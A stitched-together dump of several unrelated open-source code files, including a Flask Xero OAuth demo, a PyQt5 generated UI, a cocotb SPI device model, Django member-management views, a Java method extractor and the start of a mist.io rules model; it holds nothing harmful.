    xero_token = xero_app.obtain_xero_oauth2_token()
    new_token = xero_app.refresh_token()
    return render_template(
        "code.html",
        title="Xero OAuth2 token",
        code=jsonify({"Old Token": xero_token, "New token": new_token}),
        sub_title="token refreshed",
    )
@flask_app.route("/tenants")
def tenants():
    """List available Xero tenants; redirect to login when unauthenticated."""
    available_tenants = xero_app.get_tenants()
    if available_tenants is None:
        return redirect(url_for("login", _external=True))
    return render_template(
        "code.html",
        title="Xero Tenants",
        code=jsonify(available_tenants),
    )
@flask_app.route("/invoices")
def get_invoices():
    """Show all invoices; redirect to login when unauthenticated."""
    invoices = xero_app.get_invoices()
    if invoices is None:
        return redirect(url_for("login", _external=True))
    code = serialize_model(invoices)
    sub_title = "Total invoices found: {}".format(len(invoices.invoices))
    return render_template(
        "code.html", title="Invoices", code=code, sub_title=sub_title
    )
# start the app locally
if __name__ == '__main__':
    # Development server only; use a proper WSGI server in production.
    flask_app.run(host='localhost', port=5000)
| 2.21875 | 2 |
ui/Ui_main.py | realm520/aimless | 0 | 16946 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """pyuic5-generated UI: a tabbed window with Codec and Json tool pages.

    Generated code -- regenerate from main.ui rather than editing by hand.
    """
    def setupUi(self, MainWindow):
        """Create and lay out all widgets on ``MainWindow``."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(963, 727)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName("gridLayout")
        self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(1)
        sizePolicy.setVerticalStretch(1)
        sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
        self.tabWidget.setSizePolicy(sizePolicy)
        self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
        self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
        self.tabWidget.setObjectName("tabWidget")
        # --- Codec tab: raw text, encode/decode buttons, result text ---
        self.tab = QtWidgets.QWidget()
        self.tab.setObjectName("tab")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
        self.verticalLayout.setObjectName("verticalLayout")
        self.label = QtWidgets.QLabel(self.tab)
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        self.txtRaw = QtWidgets.QTextEdit(self.tab)
        self.txtRaw.setObjectName("txtRaw")
        self.verticalLayout.addWidget(self.txtRaw)
        self.groupBox = QtWidgets.QGroupBox(self.tab)
        self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
        self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
        self.groupBox.setObjectName("groupBox")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
        self.btnEncoding.setObjectName("btnEncoding")
        self.horizontalLayout.addWidget(self.btnEncoding)
        self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
        self.btnDecoding.setObjectName("btnDecoding")
        self.horizontalLayout.addWidget(self.btnDecoding)
        self.btnExchange = QtWidgets.QPushButton(self.groupBox)
        self.btnExchange.setObjectName("btnExchange")
        self.horizontalLayout.addWidget(self.btnExchange)
        self.btnClear = QtWidgets.QPushButton(self.groupBox)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
        self.btnClear.setSizePolicy(sizePolicy)
        self.btnClear.setObjectName("btnClear")
        self.horizontalLayout.addWidget(self.btnClear)
        self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
        self.cboxCodecType.setObjectName("cboxCodecType")
        self.cboxCodecType.addItem("")
        self.horizontalLayout.addWidget(self.cboxCodecType)
        self.verticalLayout.addWidget(self.groupBox)
        self.label_2 = QtWidgets.QLabel(self.tab)
        self.label_2.setObjectName("label_2")
        self.verticalLayout.addWidget(self.label_2)
        self.txtResult = QtWidgets.QTextEdit(self.tab)
        self.txtResult.setObjectName("txtResult")
        self.verticalLayout.addWidget(self.txtResult)
        self.tabWidget.addTab(self.tab, "")
        # --- Json tab: editor plus format/compress/escape buttons ---
        self.tab_2 = QtWidgets.QWidget()
        self.tab_2.setObjectName("tab_2")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.txtJson = QtWidgets.QTextEdit(self.tab_2)
        self.txtJson.setObjectName("txtJson")
        self.verticalLayout_2.addWidget(self.txtJson)
        self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
        self.groupBox_2.setObjectName("groupBox_2")
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonFormat.setObjectName("btnJsonFormat")
        self.horizontalLayout_2.addWidget(self.btnJsonFormat)
        self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonCompress.setObjectName("btnJsonCompress")
        self.horizontalLayout_2.addWidget(self.btnJsonCompress)
        self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonEscape.setObjectName("btnJsonEscape")
        self.horizontalLayout_2.addWidget(self.btnJsonEscape)
        self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonDeescape.setObjectName("btnJsonDeescape")
        self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
        self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonCopy.setObjectName("btnJsonCopy")
        self.horizontalLayout_2.addWidget(self.btnJsonCopy)
        self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
        self.btnJsonClear.setObjectName("btnJsonClear")
        self.horizontalLayout_2.addWidget(self.btnJsonClear)
        self.verticalLayout_2.addWidget(self.groupBox_2)
        self.tabWidget.addTab(self.tab_2, "")
        self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(0)
        # Clear wipes both the raw and result text edits.
        self.btnClear.clicked.connect(self.txtResult.clear)
        self.btnClear.clicked.connect(self.txtRaw.clear)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Set all user-visible strings (translation entry point)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.label.setText(_translate("MainWindow", "Raw Text:"))
        self.groupBox.setTitle(_translate("MainWindow", "Operation"))
        self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
        self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
        self.btnExchange.setText(_translate("MainWindow", "Exchange"))
        self.btnClear.setText(_translate("MainWindow", "Clear"))
        self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
        self.label_2.setText(_translate("MainWindow", "Result Text:"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
        self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
        self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
        self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
        self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
        self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
        self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
        self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
if __name__ == "__main__":
    # Manual preview: build the generated UI in a bare QMainWindow.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
| 1.773438 | 2 |
leetcode/345.reverse-vowels-of-a-string.py | geemaple/algorithm | 177 | 16947 | class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s) | 3.203125 | 3 |
examples/02_pybind/01_basic/example.py | BlockResearchGroup/WS_interoperability | 1 | 16948 | <reponame>BlockResearchGroup/WS_interoperability<filename>examples/02_pybind/01_basic/example.py
# example.py
# Smoke test for the compiled pybind11 extension module `basic`:
# calls its C++ add() binding and prints the sum (expected output: 6).
import basic
result = basic.add(1, 5)
print(result)
| 1.84375 | 2 |
cocotbext/spi/devices/TI/DRV8304.py | eoshea/cocotbext-spi | 2 | 16949 | <reponame>eoshea/cocotbext-spi<filename>cocotbext/spi/devices/TI/DRV8304.py
import cocotb
from cocotb.triggers import FallingEdge, RisingEdge, First, Timer, Event
from ... import SpiSlaveBase, SpiConfig, SpiFrameError, SpiFrameTimeout
class DRV8304(SpiSlaveBase):
    """cocotb bus-functional model of a TI DRV8304 SPI register interface.

    Frame layout (MSB first, 16 bits): 1 R/W bit (1 = read), 4 address
    bits, 11 data bits.  Bus mode is CPOL=0 / CPHA=1 with a minimum
    inter-frame spacing of 400 ns.
    """

    def __init__(self, signals):
        # SPI bus parameters for this device.
        self._config = SpiConfig(
            word_width=16,
            cpol=False,
            cpha=True,
            msb_first=True,
            frame_spacing_ns=400
        )

        # Register file: address -> 11-bit value.
        # NOTE(review): values look like power-on defaults — confirm
        # against the DRV8304 datasheet.
        self._registers = {
            0: 0b00000000000,
            1: 0b00000000000,
            2: 0b00000000000,
            3: 0b01101110111,
            4: 0b11101110111,
            5: 0b00101000101,
            6: 0b01010000011
        }

        super().__init__(signals)

    async def get_register(self, reg_num):
        """Return the current value of register *reg_num* once the bus is idle."""
        await self.idle.wait()
        return self._registers[reg_num]

    def create_spi_word(self, operation, address, content):
        """Build the 16-bit command word for a 'read' or 'write' transaction.

        Raises ValueError for an unknown operation or an address outside
        the register file.
        """
        command = 0
        if operation == "read":
            command |= 1 << 15
        elif operation == "write":
            # it is already 0
            pass
        else:
            raise ValueError("Expected operation to be in ['read', 'write']")

        try:
            # Lookup only validates the address; the value is unused here.
            self._registers[address]
        except KeyError:
            raise ValueError(f"Expected address to be in {list(self._registers.keys())}")

        command |= (address & 0b1111) << 11
        command |= (content & 0b11111111111)

        return command

    async def _transaction(self, frame_start, frame_end):
        """Serve one 16-bit SPI frame between chip-select assert/deassert."""
        await frame_start
        self.idle.clear()

        # SCLK pin should be low at the chip select edge
        if bool(self._sclk.value):
            raise SpiFrameError("DRV8304: sclk should be low at chip select edge")

        # Bit 15: R/W flag (0 = write); bits 14-11: address; bits 10-0:
        # data, while simultaneously shifting out the current register
        # value on MISO.
        do_write = not bool(await self._shift(1))
        address = int(await self._shift(4))
        content = int(await self._shift(11, tx_word=self._registers[address]))

        # end of frame
        if await First(frame_end, RisingEdge(self._sclk)) != frame_end:
            raise SpiFrameError("DRV8304: clocked more than 16 bits")

        if bool(self._sclk.value):
            raise SpiFrameError("DRV8304: sclk should be low at chip select edge")

        # Commit the write only after a well-formed frame.
        if do_write:
            self._registers[address] = content
| 2.234375 | 2 |
manage.py | Kenneth-joseph/Blogs | 0 | 16950 | <filename>manage.py
from app import create_app,db
from flask_script import Manager,Server
from app.models import User,Comment,Blog
from flask_migrate import Migrate, MigrateCommand
#manage.shell
# Creating app instance
app = create_app('production')
migrate = Migrate(app,db)
manager = Manager(app)

# CLI entry points: `./manage.py db ...` for migrations and
# `./manage.py server` to run the development server.
manager.add_command('db',MigrateCommand)
manager.add_command('server',Server)

@manager.shell
def make_shell_context():
    # Objects pre-imported into the `./manage.py shell` session.
    return dict(db=db,app= app, User = User ,Comment=Comment, Blog=Blog)

if __name__== '__main__':
    manager.run()
    # NOTE(review): this only executes after manager.run() returns (i.e.
    # once the chosen command/server exits), so it likely never creates
    # tables as intended — confirm and consider moving it before run()
    # inside an app context.
    db.create_all()
src/apps/core/migrations/0005_auto_20180417_1219.py | zhiyuli/HydroLearn | 0 | 16951 | <reponame>zhiyuli/HydroLearn<filename>src/apps/core/migrations/0005_auto_20180417_1219.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 17:19
from __future__ import unicode_literals
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds a random, unique `ref_id` to
    # Topic and re-points the slug field to auto-populate from it.
    # Do not hand-edit operations of applied migrations.

    dependencies = [
        ('core', '0004_auto_20180417_1218'),
    ]

    operations = [
        migrations.AddField(
            model_name='topic',
            name='ref_id',
            field=django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True),
        ),
        migrations.AlterField(
            model_name='topic',
            name='slug',
            field=django_extensions.db.fields.AutoSlugField(blank=True, default='', editable=False, help_text='Please enter a unique slug for this Topic (can autogenerate from name field)', max_length=64, populate_from=('ref_id',), unique=True, verbose_name='slug'),
        ),
    ]
| 1.75 | 2 |
syncgateway/__init__.py | ecordell/syncgateway-admin-client | 0 | 16952 | __author__ = '<NAME>'
__copyright__ = 'Copyright 2012-2015 Localmed, Inc.'

# Package version, exposed as a dotted string and as a tuple of its
# components (note: components are str, not int).
__version__ = "0.1.6"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
| 1.171875 | 1 |
members/views.py | leonrenkema/makerspaceleiden-crm | 5 | 16953 | <filename>members/views.py
from django.shortcuts import render, redirect
from django.contrib.auth.forms import PasswordResetForm
from django.core.mail import EmailMessage
from django.template import loader
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.db.utils import IntegrityError
from django.urls import reverse
from django.template.loader import render_to_string, get_template
from .forms import NewUserForm, NewAuditRecordForm
from acl.models import Entitlement, PermitType
from members.models import Tag, User, clean_tag_string, AuditRecord
from mailinglists.models import Mailinglist, Subscription
import logging
import datetime
import sys
import re
logger = logging.getLogger(__name__)
@login_required
def index(request):
    """Overview page: for each entitlement holder, the set of permits held.

    Renders members/index.html with:
      agg   -- {holder: {permit_name: 1}} marking which permits each holds
      perms -- {permit_name: 1} of every permit seen (table columns)
    """
    lst = Entitlement.objects.order_by("holder__id")

    agg = {}
    perms = {}
    for e in lst:
        # Idiomatic membership test; also dropped the unused `output`
        # local that the original initialised and never used.
        if e.holder not in agg:
            agg[e.holder] = {}
        perms[e.permit.name] = 1
        agg[e.holder][e.permit.name] = 1

    context = {
        "agg": agg,
        "perms": perms,
        "has_permission": request.user.is_authenticated,
    }
    return render(request, "members/index.html", context)
@login_required
def newmember(request):
    """Privileged-only form view that creates a member account.

    On a valid POST: creates the User, optionally assigns a door tag,
    subscribes the user to the selected mailing lists (best effort), and
    sends a password-reset style invite email.  On GET (or invalid POST)
    renders the empty signup form.
    """
    if not request.user.is_privileged:
        return HttpResponse("XS denied", status=403, content_type="text/plain")

    if request.POST:
        form = NewUserForm(request.POST)
        if form.is_valid():
            try:
                email = form.cleaned_data.get("email")
                tag = form.cleaned_data.get("tag")
                newmember = User.objects.create_user(
                    email=email,
                    first_name=form.cleaned_data.get("first_name"),
                    last_name=form.cleaned_data.get("last_name"),
                )

                # Do not set this - it silently blocks the invite mails deep in PasswordResetForm.
                #
                # newmember.set_unusable_password()
                #
                newmember.set_password(User.objects.make_random_password())

                if form.cleaned_data.get("phone_number"):
                    newmember.phone_number = form.cleaned_data.get("phone_number")
                newmember.changeReason = (
                    "Added by {} with the newnmeber signup form".format(request.user)
                )
                newmember.save()

                # sanity check.
                newmember = User.objects.get(email=email)

                # Wire up the tag if one was provided.
                if form.cleaned_data.get("tag"):
                    tag.reassing_to_user(
                        newmember,
                        request.user,
                        activate=form.cleaned_data.get("activate_doors"),
                    )

                # Subscribe user if needed.  Failures are logged but do not
                # abort member creation (best effort by design).
                for mlist_name in form.cleaned_data.get("mailing_lists"):
                    try:
                        mlist = Mailinglist.objects.get(name=mlist_name)
                        s = Subscription.objects.create(
                            mailinglist=mlist,
                            member=newmember,
                            active=True,
                            digest=False,
                        )
                        s.subscribe()
                        # s.changeReason("Subscribed during form based new user create")
                        s.save()
                    except Exception as e:
                        logger.error(
                            "Failed to subscribe user {} to {} : {}".format(
                                request.user, mlist_name, e
                            )
                        )

                # Send welcome email by reusing Django's password-reset
                # machinery with custom invite templates.
                form = PasswordResetForm({"email": newmember.email})
                if not form.is_valid():
                    raise Exception("Internal issue")
                form.save(
                    from_email=settings.DEFAULT_FROM_EMAIL,
                    email_template_name="members/email_newmembers_invite.txt",
                    subject_template_name="members/email_newmembers_invite_subject.txt",
                )
                return redirect("index")
            except IntegrityError as e:
                logger.error("Failed to create user : {}".format(e))
                return HttpResponse(
                    "Create gone wrong. Was that email or name already added ?",
                    status=500,
                    content_type="text/plain",
                )
            except Exception as e:
                # Capture file/line of the failure for the log message.
                # NOTE(review): the format arguments are (filename, lineno, e)
                # so the message reads "user : <file> at <line>:<error>" —
                # probably meant "{} at {}:{}" with (e, filename, lineno).
                exc_type, exc_obj, tb = sys.exc_info()
                f = tb.tb_frame
                lineno = tb.tb_lineno
                filename = f.f_code.co_filename
                logger.error(
                    "Failed to create user : {} at {}:{}".format(filename, lineno, e)
                )
                return HttpResponse(
                    "Create gone wrong. Drat.", status=500, content_type="text/plain"
                )
        else:
            logger.debug("Form not valid")

    context = {
        "label": "Add a new member",
        "title": "New Member",
        "action": "Invite",
        "has_permission": request.user.is_authenticated,
    }
    context["form"] = NewUserForm()
    return render(request, "members/newmember.html", context)
@login_required
def sudo(request):
    """Escalate the current user to privileged (admin) mode.

    POST with a valid NewAuditRecordForm writes an AuditRecord stating
    why escalation was needed, then redirects back to `return_to`.
    GET renders the form, pre-filling `return_to` from the referer.
    """
    if not request.user.can_escalate_to_priveleged:
        return HttpResponse("XS denied", status=403, content_type="text/plain")

    if request.POST:
        form = NewAuditRecordForm(request.POST)
        if form.is_valid():
            try:
                record = form.save(commit=False)
                record.user = request.user
                record.changeReason = (
                    f"SUDO escalation in webinterface by {request.user}"
                )
                record.save()
                return redirect(form.cleaned_data.get("return_to"))
                # return redirect('index')
            except Exception as e:
                logger.error("Failed to create uudit recordser : {}".format(e))
                return HttpResponse(
                    "Could not create audit record.",
                    status=500,
                    content_type="text/plain",
                )

    # Default the post-escalation destination to the referring page,
    # falling back to the index page when no referer is present.
    rurl = reverse("index")
    if "HTTP_REFERER" in request.META:
        rurl = request.META["HTTP_REFERER"]

    form = NewAuditRecordForm(None, initial={"return_to": rurl})
    context = {
        "label": "GDPR (AVG)",
        "title": "Become and admin",
        "action": "go admin",
        "form": form,
        "back": "index",
        "has_permission": request.user.is_authenticated,
        "preamble": render_to_string("precooked_gdpr_options.html"),
    }
    return render(request, "crud.html", context)
@login_required
def drop(request):
    """Drop privileged (admin) mode by writing a final audit record.

    Mirrors sudo() above; redirects the user back to the page they came
    from, or to the index page when no referer header is present.
    """
    # @login_required added for consistency with the sibling views; an
    # anonymous request would otherwise hit an attribute error below.
    if not request.user.can_escalate_to_priveleged:
        return HttpResponse("XS denied", status=403, content_type="text/plain")

    record = AuditRecord(
        user=request.user, final=True, action="Drop privs from webinterface"
    )
    # Fixed: the original assigned lowercase `record.changereason`, but the
    # rest of this module uses `changeReason`, so the reason text was
    # silently dropped instead of being recorded.
    if request.user.is_privileged:
        record.changeReason = f"DROP in webinterface by {request.user}"
    else:
        record.changeReason = f"DROP in webinterface by {request.user} - but actual permission had already timed out."
    record.save()

    # Guard against a missing referer (sudo() handles the same case).
    return redirect(request.META.get("HTTP_REFERER", reverse("index")))
| 2.0625 | 2 |
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py | lremember/VFC | 1 | 16954 | # Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
    """Deprecated NS-instance collection endpoint: list (GET) and create (POST)."""

    @swagger_auto_schema(
        request_body=None,
        responses={
            status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
            status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request):
        """Return all known NS instances, validated through the response serializer."""
        logger.debug("CreateNSView::get")
        ret = GetNSInfoService().get_ns_info()
        logger.debug("CreateNSView::get::ret=%s", ret)
        resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
        if not resp_serializer.is_valid():
            raise NSLCMException(resp_serializer.errors)
        return Response(data=resp_serializer.data, status=status.HTTP_200_OK)

    @swagger_auto_schema(
        request_body=_CreateNsReqSerializer(),
        responses={
            status.HTTP_201_CREATED: _CreateNsRespSerializer(),
            status.HTTP_400_BAD_REQUEST: "Bad Request",
            status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
        }
    )
    @view_safe_call_with_log(logger=logger)
    def post(self, request):
        """Create an NS instance from csarId/nsName/description/context.

        A request with test == "test" short-circuits and returns a dummy
        instance id (used by test tooling).
        """
        logger.debug("Enter CreateNS: %s", request.data)
        req_serializer = _CreateNsReqSerializer(data=request.data)
        if not req_serializer.is_valid():
            raise BadRequestException(req_serializer.errors)

        if ignore_case_get(request.data, 'test') == "test":
            return Response(
                data={'nsInstanceId': "test"},
                status=status.HTTP_201_CREATED
            )

        csar_id = ignore_case_get(request.data, 'csarId')
        ns_name = ignore_case_get(request.data, 'nsName')
        description = ignore_case_get(request.data, 'description')
        context = ignore_case_get(request.data, 'context')
        ns_inst_id = CreateNSService(
            csar_id,
            ns_name,
            description,
            context
        ).do_biz()
        logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)

        # NOTE(review): most response fields here are hard-coded
        # placeholders; only nsInstanceId reflects the created instance.
        resp_serializer = _CreateNsRespSerializer(
            data={'nsInstanceId': ns_inst_id,
                  'nsInstanceName': 'nsInstanceName',
                  'nsInstanceDescription': 'nsInstanceDescription',
                  'nsdId': 123,
                  'nsdInfoId': 456,
                  'nsState': 'NOT_INSTANTIATED',
                  '_links': {'self': {'href': 'href'}}})
        if not resp_serializer.is_valid():
            raise NSLCMException(resp_serializer.errors)
        return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
| 1.53125 | 2 |
parse_training_input.py | alexpotter1/vulndetect-ml | 1 | 16955 | #!/usr/bin/env python3
import javalang
def isPrimitive(obj):
    """Return True when *obj* carries no instance __dict__ (a 'primitive' value)."""
    has_attr_dict = hasattr(obj, '__dict__')
    return not has_attr_dict
def extract_bad_function_from_text(src):
    # Convenience wrapper: extract the method literally named 'bad'
    # from Java source text.
    return extract_function_from_text(src, criterion='bad')
def extract_function_from_text(src, criterion='bad'):
    """Extract the source text of the Java method named *criterion* from *src*.

    Parses *src* with javalang, locates the first MethodDeclaration whose
    name matches *criterion* (case-insensitive), and returns the raw source
    lines spanning the method (joined without newlines).  Returns "" when no
    method matches; returns None implicitly when parsing fails (the error is
    printed).
    """
    def recursive_find_deepest_child_position(node_body, prev_deepest=0):
        # Walk the AST subtree and return the greatest line number seen,
        # i.e. the last line occupied by the method body.
        child_direct_child_set = None
        # line number, don't currently care about column too much
        if isinstance(node_body, list):
            deepest_position = prev_deepest
            # NOTE(review): `c is not isPrimitive(c)` compares c against a
            # bool by identity, which is almost always True — the intent was
            # probably `not isPrimitive(c)`.  Left as-is; confirm before
            # changing, as primitives are also handled by the except below.
            node_children = [c for c in node_body if c is not isPrimitive(c) and c is not None]
            if len(node_children) == 0:
                return deepest_position
        else:
            if node_body.position is not None:
                deepest_position = node_body.position.line
            else:
                deepest_position = prev_deepest

            node_children = [c for c in node_body.children if c is not isPrimitive(c) and c is not None]
            if len(node_children) == 0:
                return deepest_position

        for child in node_children:
            try:
                if child.position is not None:
                    child_sub_pos = child.position.line
                else:
                    child_sub_pos = deepest_position
                child_direct_child_set = child.children
            except AttributeError:
                # most likely is not an object
                child_sub_pos = deepest_position
                if isinstance(child, list):
                    child_direct_child_set = child
                else:
                    child_direct_child_set = []

            if len(child_direct_child_set) > 0:
                child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)

            if child_sub_pos > deepest_position:
                deepest_position = child_sub_pos

        return deepest_position

    if not isinstance(src, str):
        src = src.decode('utf-8')

    src_split = src.split('\n')
    try:
        tree = javalang.parse.parse(src)
        for _, node in tree.filter(javalang.tree.MethodDeclaration):
            if node.name.lower() == str(criterion).lower():
                # tokenise, find the start/end of method,
                # and extract from the file
                # needed since javalang can't convert back to java src
                start_pos = node.position.line
                end_pos = None
                if (len(node.body) > 0):
                    end_pos = recursive_find_deepest_child_position(node.body[-1])

                if end_pos is None:
                    end_pos = start_pos

                # Source positions are 1-based; concatenate the raw lines.
                function_text = ""
                for line in range(start_pos, end_pos + 1):
                    function_text += src_split[line - 1]

                return function_text

        return ""
    except (javalang.parser.JavaSyntaxError,
            javalang.parser.JavaParserError) as e:
        print("ERROR OCCURRED DURING PARSING")
        print(e)
def extract_bad_function(file_path):
    # Convenience wrapper: extract the method named 'bad' from a Java file.
    return extract_function(file_path, criterion='bad')
def extract_function(file_path, criterion):
    """Read the Java file at *file_path* and extract the method named *criterion*."""
    with open(file_path, 'r') as f:
        return extract_function_from_text(f.read(), criterion)
| 2.96875 | 3 |
src/mist/api/rules/models/main.py | SpiralUp/mist.api | 6 | 16956 | <gh_stars>1-10
import uuid
import mongoengine as me
from mist.api import config
from mist.api.exceptions import BadRequestError
from mist.api.users.models import Organization
from mist.api.selectors.models import SelectorClassMixin
from mist.api.rules.base import NoDataRuleController
from mist.api.rules.base import ResourceRuleController
from mist.api.rules.base import ArbitraryRuleController
from mist.api.rules.models import RuleState
from mist.api.rules.models import Window
from mist.api.rules.models import Frequency
from mist.api.rules.models import TriggerOffset
from mist.api.rules.models import QueryCondition
from mist.api.rules.models import BaseAlertAction
from mist.api.rules.models import NotificationAction
from mist.api.rules.plugins import GraphiteNoDataPlugin
from mist.api.rules.plugins import GraphiteBackendPlugin
from mist.api.rules.plugins import InfluxDBNoDataPlugin
from mist.api.rules.plugins import InfluxDBBackendPlugin
from mist.api.rules.plugins import ElasticSearchBackendPlugin
from mist.api.rules.plugins import FoundationDBNoDataPlugin
from mist.api.rules.plugins import FoundationDBBackendPlugin
from mist.api.rules.plugins import VictoriaMetricsNoDataPlugin
from mist.api.rules.plugins import VictoriaMetricsBackendPlugin
class Rule(me.Document):
    """The base Rule mongoengine model.

    The Rule class defines the base schema of all rule types. All documents of
    any Rule subclass will be stored in the same mongo collection.

    All Rule subclasses MUST define a `_controller_cls` class attribute and a
    backend plugin. Controllers are used to perform actions on instances of
    Rule, such as adding or updating. Backend plugins are used to transform a
    Rule into the corresponding query to be executed against a certain data
    storage. Different types of rules, such as a rule on monitoring metrics or
    a rule on logging data, should also define and utilize their respective
    backend plugins. For instance, a rule on monitoring data, which is stored
    in a TSDB like Graphite, will have to utilize a different plugin than a
    rule on logging data, stored in Elasticsearch, in order to successfully
    query the database.

    The Rule class is mainly divided into two categories:

    1. Arbitrary rules - defined entirely by the user. This type of rules gives
    users the freedom to execute arbitrary queries on arbitrary data. The query
    may include (nested) expressions and aggregations on arbitrary fields whose
    result will be evaluated against a threshold based on a comparison operator
    (=, <, etc).

    2. Resource rules - defined by using Mist.io UUIDs and tags. This type of
    rules can be used to easily setup alerts on resources given their tags or
    UUIDs. In this case, users have to explicitly specify the target metric's
    name, aggregation function, and resources either by their UUIDs or tags.
    This type of rules allows for easier alert configuration on known resources
    in the expense of less elastic query expressions.

    The Rule base class can be used to query the database and fetch documents
